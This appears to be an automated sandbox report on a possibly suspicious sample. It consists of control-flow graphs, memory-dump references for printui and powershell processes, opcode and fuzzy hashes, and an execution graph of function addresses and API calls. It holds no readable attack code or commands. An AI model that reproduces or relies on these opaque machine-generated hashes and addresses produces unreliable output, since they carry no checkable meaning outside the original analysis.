                                                                                                                                                                                control_flow_graph 27 7ff67a0e1570-7ff67a0e15ac GetStartupInfoW 28 7ff67a0e15af-7ff67a0e15ba 27->28 29 7ff67a0e15bc-7ff67a0e15bf 28->29 30 7ff67a0e15d7 28->30 31 7ff67a0e15c1-7ff67a0e15c8 29->31 32 7ff67a0e15ca-7ff67a0e15d5 Sleep 29->32 33 7ff67a0e15dc-7ff67a0e15e4 30->33 31->33 32->28 34 7ff67a0e15f4-7ff67a0e15fc 33->34 35 7ff67a0e15e6-7ff67a0e15f2 _amsg_exit 33->35 37 7ff67a0e1655 34->37 38 7ff67a0e15fe-7ff67a0e161a 34->38 36 7ff67a0e1660-7ff67a0e1668 35->36 40 7ff67a0e166a-7ff67a0e167d _initterm 36->40 41 7ff67a0e1687-7ff67a0e1689 36->41 39 7ff67a0e165b 37->39 42 7ff67a0e161e-7ff67a0e1621 38->42 39->36 40->41 43 7ff67a0e1695-7ff67a0e169c 41->43 44 7ff67a0e168b-7ff67a0e168e 41->44 45 7ff67a0e1623-7ff67a0e1625 42->45 46 7ff67a0e1647-7ff67a0e1649 42->46 47 7ff67a0e169e-7ff67a0e16ac call 7ff67a0e19c0 43->47 48 7ff67a0e16c8-7ff67a0e16d5 43->48 44->43 49 7ff67a0e164b-7ff67a0e1650 45->49 50 7ff67a0e1627-7ff67a0e162a 45->50 46->39 46->49 47->48 61 7ff67a0e16ae-7ff67a0e16be 47->61 55 7ff67a0e16e1-7ff67a0e16e6 48->55 56 7ff67a0e16d7-7ff67a0e16dc 48->56 51 7ff67a0e17b6-7ff67a0e17d3 49->51 53 7ff67a0e163c-7ff67a0e1645 50->53 54 7ff67a0e162c-7ff67a0e1638 50->54 53->42 54->53 58 7ff67a0e16ea-7ff67a0e16f1 55->58 56->51 59 7ff67a0e16f3-7ff67a0e16f6 58->59 60 7ff67a0e1767-7ff67a0e176b 58->60 63 7ff67a0e16fc-7ff67a0e1702 59->63 64 7ff67a0e16f8-7ff67a0e16fa 59->64 65 7ff67a0e177b-7ff67a0e1784 60->65 66 7ff67a0e176d-7ff67a0e1777 60->66 61->48 67 7ff67a0e1712-7ff67a0e1746 call 7ff67a0e10e0 63->67 68 7ff67a0e1704-7ff67a0e1710 63->68 64->60 64->63 65->51 65->58 66->65 71 7ff67a0e1750-7ff67a0e1757 67->71 72 7ff67a0e1748-7ff67a0e174a exit 67->72 68->63 73 7ff67a0e1765 71->73 74 7ff67a0e1759-7ff67a0e175f _cexit 71->74 72->71 73->51 74->73
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.2687684615.00007FF67A0E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67A0E0000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.2687662517.00007FF67A0E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.2687721986.00007FF67A0E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff67a0e0000_printui.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 642454821-0
                                                                                                                                                                                • Opcode ID: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                                                                                                                                                                                • Instruction ID: 352a9e8a0ab7f036f0f5733b298d955a4248ea33e668fb216e45a04c5383ac22
                                                                                                                                                                                • Opcode Fuzzy Hash: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                                                                                                                                                                                • Instruction Fuzzy Hash: 42613A27E2C60382EB64AB11E54063937A1BB68B88F4409F9DA4DD73B0DF3CF941A701

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 75 7ff67a0e1520-7ff67a0e1568 __wgetmainargs
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.2687684615.00007FF67A0E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67A0E0000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.2687662517.00007FF67A0E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.2687721986.00007FF67A0E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff67a0e0000_printui.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __wgetmainargs
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1709950718-0
                                                                                                                                                                                • Opcode ID: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                                                                                                                                                                                • Instruction ID: 781578c1544607ecf91d496901518d3083cae2170c69e8bb48e15283c7e14312
                                                                                                                                                                                • Opcode Fuzzy Hash: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                                                                                                                                                                                • Instruction Fuzzy Hash: 0AE07D76D2D647E5EA14EB50E8644653B60BB04B5CF8008B5C50D93330DE3CB209EB01

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.2687684615.00007FF67A0E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67A0E0000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.2687662517.00007FF67A0E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.2687703393.00007FF67A0E2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.2687721986.00007FF67A0E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ff67a0e0000_printui.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4104442557-0
                                                                                                                                                                                • Opcode ID: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                                                                                                                                                                                • Instruction ID: 975f796ef2fddb1a54c4edbb53f3b4f477b23993b91bc1cf6e33d78b526cdf3c
                                                                                                                                                                                • Opcode Fuzzy Hash: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                                                                                                                                                                                • Instruction Fuzzy Hash: B5111F22618B428AEB10EF70E85426833A4FB5C75CF400E79EA6D87764EF7CE6649340
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.2323104506.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4d11bb87f0e8276ee5a668a13faa8b1f5b754c55b5476a5030b153d8100ed8f8
                                                                                                                                                                                • Instruction ID: e6db0e113b2c0f04996b9779d999e1029ceedc972a1599a6a8c3935b63e6a6be
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d11bb87f0e8276ee5a668a13faa8b1f5b754c55b5476a5030b153d8100ed8f8
                                                                                                                                                                                • Instruction Fuzzy Hash: 5EF1A230A1CA4D8FDB98EF5CC495AA97BF1FF68350F14416AD449D7296DB34E882CB80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.2323593031.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff849000000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a9877052d09ef10331464d3169334abec8e3773cee42f1b8996e212a06873c22
                                                                                                                                                                                • Instruction ID: 3d078ebd07aa7534bffc467422e15df69e9d3b79599617d91f7d7a53b72218c7
                                                                                                                                                                                • Opcode Fuzzy Hash: a9877052d09ef10331464d3169334abec8e3773cee42f1b8996e212a06873c22
                                                                                                                                                                                • Instruction Fuzzy Hash: 20D13731D0EACA4FEBA5AB6868155B5BBE2FF16394B0802FAD00DD70D3EA19DC05C751
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.2323104506.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b39ec437f93743c719fc95333d96a7cfbed29d0847f8033dda9f1d1c9586cffe
                                                                                                                                                                                • Instruction ID: 480ae3c72dd8f49a163fb6d6f5cf39262993f509671d81847de0ac45126b8f97
                                                                                                                                                                                • Opcode Fuzzy Hash: b39ec437f93743c719fc95333d96a7cfbed29d0847f8033dda9f1d1c9586cffe
                                                                                                                                                                                • Instruction Fuzzy Hash: D871587091CB884FEB58EF1CC895AB57BE0EF96321F14017FD08AC7197DA25A846CB51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.2323593031.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff849000000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 600b61f48771c021fca1174cbb3cf4ca05c18e58e108237b4eac0df95de5de4e
                                                                                                                                                                                • Instruction ID: 94f8d8397e1ef0dd904e038d2016d7c146fbf2b6e6c54d951dce0bfc98be3bcb
                                                                                                                                                                                • Opcode Fuzzy Hash: 600b61f48771c021fca1174cbb3cf4ca05c18e58e108237b4eac0df95de5de4e
                                                                                                                                                                                • Instruction Fuzzy Hash: 38510432E0DA8A4FEBA9EA2C641167477D1EF95262F5801FAC04EC71D3FE18E8058345
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.2323104506.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2a2017236b0811b941e36b5c42083edc1596de1b9f597fe9306d6cc00b9f81ef
                                                                                                                                                                                • Instruction ID: b9774f8defa2ada889cb54806eca0c47660a5818b239642ff11866550895a36f
                                                                                                                                                                                • Opcode Fuzzy Hash: 2a2017236b0811b941e36b5c42083edc1596de1b9f597fe9306d6cc00b9f81ef
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E31163191CB888FDB58DB5C98466A97BE0FB59720F00426FE449C3692DB74A855CBC2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.2322524191.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff848e1d000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19d5332f810cf352d86020a38338f601de4d32f7b465e0f7204e4ab1f2b728b5
                                                                                                                                                                                • Instruction ID: bd88688196c3aad79375204c4957a9ce6111c804d15ebb94319643c9af9861a6
                                                                                                                                                                                • Opcode Fuzzy Hash: 19d5332f810cf352d86020a38338f601de4d32f7b465e0f7204e4ab1f2b728b5
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B41F47180DBC54FE7969B2998419523FF0FF57260F1505EFE088CB1A3DA25A846C7A2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.2323593031.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff849000000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8b07fe6f6a7c08cc59ef141f8856402a95778eff2cbf698738d6cf0c0ae0c698
                                                                                                                                                                                • Instruction ID: b0a3ce9a5823f15920fe74fed76a7d0463633c16ab200eb43629cf8ef449141e
                                                                                                                                                                                • Opcode Fuzzy Hash: 8b07fe6f6a7c08cc59ef141f8856402a95778eff2cbf698738d6cf0c0ae0c698
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C21AC32E0EA8A4FEBB9EA18645017476D1EF55262B4900FAD00EC71E3FE18EC058349
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.2323104506.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                • Instruction ID: deb923fabd2837f2379e5f9e01aad23e341a67bf454069198374004b12345de3
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                • Instruction Fuzzy Hash: 4601677111CB0D4FD744EF0CE451AA6B7E0FB95364F10056EE58AC3695D736E882CB45
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.2323104506.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8522be662a2ed5b6a5bb9fc4c0007a505301ac44333270fcf3fb820a5efd55ee
                                                                                                                                                                                • Instruction ID: d52dd63024383cfe8f654ba5c5fada6558947629769d78383e60c6bdb4eec9ae
                                                                                                                                                                                • Opcode Fuzzy Hash: 8522be662a2ed5b6a5bb9fc4c0007a505301ac44333270fcf3fb820a5efd55ee
                                                                                                                                                                                • Instruction Fuzzy Hash: 59F0B43180C68D8FDB46EF3888595D57FA0EF17351F04029BE45CC74A2DB659858CB82
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.2323593031.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff849000000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1d992346f5ff967f308444be17de08e3e92183f57e2224af3fe93863ffbd2669
                                                                                                                                                                                • Instruction ID: 76ae9208038e5bce1fbf58fdf4ebc06cd5f984ff1f1cc8a6d4fd3551c488b24c
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d992346f5ff967f308444be17de08e3e92183f57e2224af3fe93863ffbd2669
                                                                                                                                                                                • Instruction Fuzzy Hash: EEF09A32A0C5858FEBA4EB1CA4558A8B7E0EF453A0B1500F6E05DC70A3EB29EC40C754
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.2323104506.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: L_^$L_^$L_^$L_^$L_^
                                                                                                                                                                                • API String ID: 0-2264858084
                                                                                                                                                                                • Opcode ID: defb422b034e4d669841c0fca42e72beead9c823487af276a02348702d042e5a
                                                                                                                                                                                • Instruction ID: c08514c8adfa329f7144f0d13b3f48b640ca2a3364c778611a1daf3c8b0871c2
                                                                                                                                                                                • Opcode Fuzzy Hash: defb422b034e4d669841c0fca42e72beead9c823487af276a02348702d042e5a
                                                                                                                                                                                • Instruction Fuzzy Hash: 516129B291E6C24FD3569B3828590A87FA1FF22294B5D01FFC1C44B1D3EA1C581AC34B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000010.00000002.2323104506.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ff848f30000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0%I$8%I$X%I$x%I$%I
                                                                                                                                                                                • API String ID: 0-4190245882
                                                                                                                                                                                • Opcode ID: 8d4c5b4411f1fad1b56be6b3b73b0b43bfa733774bcfb86116d5155e53fa7ac7
                                                                                                                                                                                • Instruction ID: 4058584c056f61637f2806d4ed7704490e122607482bcfbb5ed626e212bd296d
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d4c5b4411f1fad1b56be6b3b73b0b43bfa733774bcfb86116d5155e53fa7ac7
                                                                                                                                                                                • Instruction Fuzzy Hash: 9721D763E0F9CA5FF2AA8B2C7C190386F90EF52AB0B590BFBC084471DFE9155C094195

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:1.8%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:18.7%
                                                                                                                                                                                Total number of Nodes:1884
                                                                                                                                                                                Total number of Limit Nodes:83
                                                                                                                                                                                execution_graph 116029 7ff8b8399fa1 116030 7ff8b8399fa9 116029->116030 116051 7ff8b839a07e 116030->116051 116052 7ff8b839ef80 116030->116052 116033 7ff8b836cfb0 10 API calls 116046 7ff8b8399ee0 116033->116046 116034 7ff8b839ef80 2 API calls 116036 7ff8b8399fe7 116034->116036 116037 7ff8b839a000 116036->116037 116076 7ff8b83b3b60 116036->116076 116039 7ff8b839a031 116037->116039 116040 7ff8b83b3b60 2 API calls 116037->116040 116055 7ff8b83b5b80 116039->116055 116040->116039 116043 7ff8b839b0e4 116044 7ff8b8374a70 14 API calls 116044->116046 116045 7ff8b839ba90 free free 116045->116046 116046->116043 116046->116044 116046->116045 116070 7ff8b836cfb0 116046->116070 116079 7ff8b83998c0 116046->116079 116089 7ff8b836a330 116046->116089 116106 7ff8b839f2d0 16 API calls 116046->116106 116049 7ff8b839a076 116050 7ff8b839ef80 2 API calls 116049->116050 116049->116051 116050->116051 116051->116033 116051->116046 116053 7ff8b83b3b60 2 API calls 116052->116053 116054 7ff8b8399fd4 116053->116054 116054->116034 116107 7ff8b83a0160 free free 116055->116107 116057 7ff8b83b5bae 116110 7ff8b83b6b50 116057->116110 116059 7ff8b83b5bbe 116060 7ff8b83b5bdf 116059->116060 116061 7ff8b839ef80 2 API calls 116059->116061 116066 7ff8b83b5c19 116059->116066 116060->116049 116062 7ff8b83b5c09 116061->116062 116064 7ff8b83b3b60 2 API calls 116062->116064 116062->116066 116063 7ff8b836a330 41 API calls 116063->116060 116065 7ff8b83b5c29 116064->116065 116065->116066 116067 7ff8b83b5c3c 116065->116067 116066->116060 116066->116063 116175 7ff8b836cb20 calloc free free 116067->116175 116069 7ff8b83b5c56 116069->116066 116071 7ff8b836cfe0 116070->116071 116072 7ff8b83b3b60 2 API calls 116071->116072 116075 7ff8b836cfe5 116071->116075 116072->116075 116073 7ff8b83c9e10 8 API calls 116074 7ff8b836d0c0 116073->116074 116074->116046 116075->116073 116077 7ff8b83b3b72 QueryPerformanceCounter 116076->116077 116078 7ff8b83b3bad GetTickCount 116076->116078 116077->116037 116078->116037 116080 7ff8b83998f2 116079->116080 116088 7ff8b83998eb 116079->116088 116081 7ff8b83998f7 free free 116080->116081 116082 7ff8b839992c 116081->116082 116084 7ff8b839996a 116082->116084 116326 7ff8b839ebb0 16 API calls 116082->116326 116085 7ff8b83999d8 116084->116085 116327 7ff8b83a0060 19 API calls 116084->116327 116322 7ff8b836a6b0 116085->116322 116088->116046 116090 7ff8b836a46b 116089->116090 116091 7ff8b836a339 116089->116091 116090->116046 116091->116090 116092 7ff8b836a46d 116091->116092 116093 7ff8b836a427 116091->116093 116095 7ff8b8374b60 18 API calls 116092->116095 116094 7ff8b8374b60 18 API calls 116093->116094 116096 7ff8b836a44e 116094->116096 116097 7ff8b836a47f 116095->116097 116348 7ff8b836b4c0 116096->116348 116356 7ff8b836bae0 116097->116356 116100 7ff8b836a495 116101 7ff8b836a4aa 116100->116101 116364 7ff8b836b9f0 10 API calls 116100->116364 116365 7ff8b8368c90 116101->116365 116105 7ff8b8368c90 21 API calls 116105->116090 116106->116046 116176 7ff8b83a3920 116107->116176 116109 7ff8b83a01b0 116109->116057 116111 7ff8b83b6b9d 116110->116111 116174 7ff8b83b6b93 116110->116174 116186 7ff8b83b6910 calloc 116111->116186 116115 7ff8b83b6ba2 116116 7ff8b83b6bea 116115->116116 116117 7ff8b83b6bd8 _strdup 116115->116117 116115->116174 116118 7ff8b83b6bf6 _strdup 116116->116118 116119 7ff8b83b6c08 116116->116119 116117->116116 116117->116174 116118->116119 116118->116174 116120 7ff8b83b6c14 _strdup 116119->116120 116121 7ff8b83b6c26 116119->116121 116120->116121 116120->116174 116124 7ff8b83b6c9c 116121->116124 116121->116174 116279 7ff8b8394eb0 116121->116279 116124->116174 116194 7ff8b83b7960 116124->116194 116126 7ff8b83b6d22 116128 7ff8b83b6d30 _strdup 116126->116128 116129 7ff8b83b6d46 116126->116129 116127 7ff8b83b6d0c _strdup 116127->116126 116127->116174 116128->116129 116129->116174 116215 7ff8b83b7e20 116129->116215 116131 7ff8b83b6d60 116131->116174 116231 7ff8b8394d90 116131->116231 116133 7ff8b83b6eb2 116134 7ff8b83b6f92 116133->116134 116135 7ff8b83b6efd 116133->116135 116133->116174 116134->116174 116241 7ff8b836ad70 116134->116241 116136 7ff8b83b6f38 116135->116136 116135->116174 116282 7ff8b8369b70 6 API calls 116136->116282 116139 7ff8b83b6f4e 116140 7ff8b83b9050 12 API calls 116139->116140 116139->116174 116143 7ff8b83b6f60 116140->116143 116141 7ff8b83b7303 116142 7ff8b83b749d 116141->116142 116287 7ff8b8369ee0 43 API calls 116141->116287 116144 7ff8b8374b60 18 API calls 116142->116144 116143->116174 116144->116174 116146 7ff8b83b733c 116147 7ff8b83b7345 116146->116147 116148 7ff8b83b748e 116146->116148 116150 7ff8b83b737c 116147->116150 116151 7ff8b8374b60 18 API calls 116147->116151 116149 7ff8b8374b60 18 API calls 116148->116149 116149->116142 116288 7ff8b83c4ee0 15 API calls 116150->116288 116153 7ff8b83b736e 116151->116153 116153->116142 116153->116150 116154 7ff8b83b7387 116156 7ff8b83b7391 116154->116156 116154->116174 116155 7ff8b83b6fe3 116155->116141 116157 7ff8b83b70f3 116155->116157 116289 7ff8b8369b70 6 API calls 116156->116289 116158 7ff8b83b714e 116157->116158 116159 7ff8b83b70fc free free 116157->116159 116160 7ff8b83b7163 free free free free 116158->116160 116161 7ff8b83b7207 free free free 116158->116161 116159->116158 116160->116161 116163 7ff8b83b72a8 116161->116163 116283 7ff8b8374b60 116163->116283 116164 7ff8b83b73d1 116165 7ff8b83b72fe 116164->116165 116169 7ff8b8374b60 18 API calls 116164->116169 116249 7ff8b83b9050 116165->116249 116167 7ff8b83b73a7 116167->116164 116168 7ff8b8374b60 18 API calls 116167->116168 116167->116174 116168->116164 116170 7ff8b83b73ff 116169->116170 116170->116165 116290 7ff8b83c9e10 116174->116290 116175->116069 116177 7ff8b83a3944 116176->116177 116178 7ff8b83a3936 116176->116178 116185 7ff8b8374d90 18 API calls 116177->116185 116184 7ff8b8374d90 18 API calls 116178->116184 116181 7ff8b83a3942 116182 7ff8b83a399c 116181->116182 116183 7ff8b83a3987 free 116181->116183 116182->116109 116183->116181 116183->116182 116184->116181 116185->116181 116187 7ff8b83b6ab8 116186->116187 116188 7ff8b83b6939 116186->116188 116187->116115 116189 7ff8b83b3b60 2 API calls 116188->116189 116190 7ff8b83b6998 116189->116190 116191 7ff8b83b6a95 _strdup 116190->116191 116192 7ff8b83b6ae9 116190->116192 116191->116192 116193 7ff8b83b6aa7 free free 116191->116193 116192->116115 116193->116187 116195 7ff8b83b79c6 116194->116195 116196 7ff8b83b799c free _strdup 116194->116196 116197 7ff8b83b79d2 free free 116195->116197 116198 7ff8b83b79ea 116195->116198 116196->116195 116212 7ff8b83b6cc8 116196->116212 116197->116198 116203 7ff8b83b7ace 116198->116203 116299 7ff8b839bd10 27 API calls 116198->116299 116200 7ff8b83b7a32 116201 7ff8b83b7a60 116200->116201 116202 7ff8b83b7a36 116200->116202 116205 7ff8b83b7a62 116201->116205 116206 7ff8b83b7a5e 116201->116206 116204 7ff8b8374b60 18 API calls 116202->116204 116207 7ff8b83b7b71 116203->116207 116208 7ff8b83b7b52 _strdup 116203->116208 116203->116212 116204->116206 116300 7ff8b8374a70 14 API calls 116205->116300 116210 7ff8b83b7a87 free _strdup 116206->116210 116211 7ff8b83b7aa8 116206->116211 116207->116212 116213 7ff8b83b7bd2 _strdup 116207->116213 116208->116207 116208->116212 116210->116211 116210->116212 116211->116203 116214 7ff8b83b7ab5 _strdup 116211->116214 116212->116126 116212->116127 116212->116174 116213->116212 116214->116203 116214->116212 116226 7ff8b83b7e52 116215->116226 116216 7ff8b8394d90 10 API calls 116216->116226 116217 7ff8b83b8066 116221 7ff8b83b8058 116217->116221 116302 7ff8b8361130 _time64 free free free 116217->116302 116219 7ff8b83b7f2a strchr 116220 7ff8b83b7f3c strtol 116219->116220 116219->116226 116220->116226 116221->116131 116222 7ff8b83b80cc 116222->116221 116224 7ff8b83b80d4 _strdup 116222->116224 116224->116221 116228 7ff8b83b80f8 116224->116228 116225 7ff8b83b7fdc free 116225->116226 116226->116216 116226->116217 116226->116219 116226->116221 116226->116225 116227 7ff8b83b7ef7 free 116226->116227 116229 7ff8b8374b60 18 API calls 116226->116229 116301 7ff8b83b7c10 24 API calls 116226->116301 116227->116226 116230 7ff8b8374b60 18 API calls 116228->116230 116229->116226 116230->116221 116232 7ff8b8394dc6 116231->116232 116303 7ff8b83950f0 116232->116303 116235 7ff8b8394dfc 116239 7ff8b8394e06 116235->116239 116240 7ff8b8394e17 _strdup 116235->116240 116236 7ff8b8394dee 116310 7ff8b8377c70 free 116236->116310 116238 7ff8b8394df3 116238->116133 116239->116133 116240->116133 116242 7ff8b836af68 116241->116242 116244 7ff8b836ad79 116241->116244 116242->116155 116243 7ff8b836aef9 116245 7ff8b83c9e10 8 API calls 116243->116245 116244->116243 116246 7ff8b83b3b60 2 API calls 116244->116246 116245->116242 116247 7ff8b836adfc 116246->116247 116247->116243 116248 7ff8b836a330 41 API calls 116247->116248 116248->116247 116250 7ff8b83b9070 116249->116250 116251 7ff8b83b741f 116250->116251 116252 7ff8b83b9092 free 116250->116252 116253 7ff8b83b909b 116250->116253 116251->116174 116257 7ff8b83b8e00 116251->116257 116252->116253 116254 7ff8b83b90a7 116253->116254 116255 7ff8b83b90b5 _strdup 116253->116255 116256 7ff8b8394d90 10 API calls 116254->116256 116255->116251 116256->116251 116258 7ff8b836cfb0 10 API calls 116257->116258 116262 7ff8b83b8e29 116258->116262 116259 7ff8b83b8f9d calloc 116260 7ff8b83b8fcb 116259->116260 116271 7ff8b83b8f13 116259->116271 